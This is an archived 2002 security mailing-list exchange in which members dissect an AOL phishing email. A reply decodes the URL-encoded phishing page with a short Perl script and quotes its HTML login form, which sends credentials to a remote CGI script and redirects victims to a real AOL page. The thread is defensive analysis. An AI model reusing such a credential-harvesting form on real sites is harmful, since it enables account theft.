[Dshield] OT?: some stuff, a firewall won't catch

Patrick Oonk patrick.oonk at pine.nl
Fri Nov 15 19:34:33 GMT 2002


On Fri, Nov 15, 2002 at 11:09:17AM -0500, Bernd Loske wrote:
> First:
> It's your own fault, if you really go to the site below and try to log in
> with your account/password -- you have been warned.

The page is 'encrypted' using URl encoding.

I used the following simple perl script (tnx to
http://tech-web.net/perl_memo.html)  to decode it.

foreach(<>) {
  print URLd($_);
}

sub URLd{
my $URLdecode=shift;
$URLdecode=~tr/+/ /;
$URLdecode=~s/%([a-fA-F0-9]{2})/pack("C",hex($1))/eg;
return $URLdecode;}

$ perl ud < index.html |more 

The most noticable part is the following:

<form action="http://64.143.44.63/cgi-local/crow.cgi"
method="POST"name="login">^M
^M
^M
<!-- This is the email where they go -->^M
^M
<input type="hidden" name="recipient"
value="JoshuaKneeland at email.com">^M
^M
<!-- This is the email where they go.. end. -->^M
^M
^M
^M
<input type="hidden"^M
    name="subject" value="gp says kristi is god"><input^M
    type="hidden" name="redirect"^M
    value="http://love.aol.com/LoveMain/"><input type="hidden"^M
    name="phish" value><table border="0" cellpadding="2"^M
    cellspacing="0" align="center">^M

Also notice the CR's to end lines and the fact that parts of
it are created with Frontpage: the signs of a true loser.

	Patrick

> 
> I found the email below in the inbox of my AOL account (yeap - still have
> that) this morning. I usually would have deleted it right away, but I was
> curious about what these spammers try now, to get your time and money. So --
> fire up lynx and go to the referenced page -- well -- after getting the
> source and making it readable, it revealed a nice piece of social
> engineering. The casual observer might really think, that he logs in into
> AOL. And in doing so, his/her account/password gets posted to some web
> server in the process. I wonder how many AOL accounts got compromised ? ...
> 
> How do you catch that, except telling everybody over and over, not to click
> on links, to trust nobody and that the internet became a bad place to be?
> 
> 
> 
> 
> -----Original Message-----
> From: RuffRyderLK at aol.com [mailto:RuffRyderLK at aol.com]
> Sent: Thursday, November 14, 2002 7:08 PM
> To: undisclosed-recipients:
> Subject: You have an admirer!
> 
> 
> Someone has sent you a secret message. <A
> HREF=http://members.truepath.com/vegazisfun/>Click here to redeem your
> message now!</A>
> 
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list

-- 
 Patrick Oonk    -   Pine Digital Security    -   patrick.oonk at pine.nl
 T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl 
 PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4 7283 A4E7 4BBF
                  One thing less to worry about...
 Excuse of the day: Electricians made popcorn in the power supply




More information about the list mailing list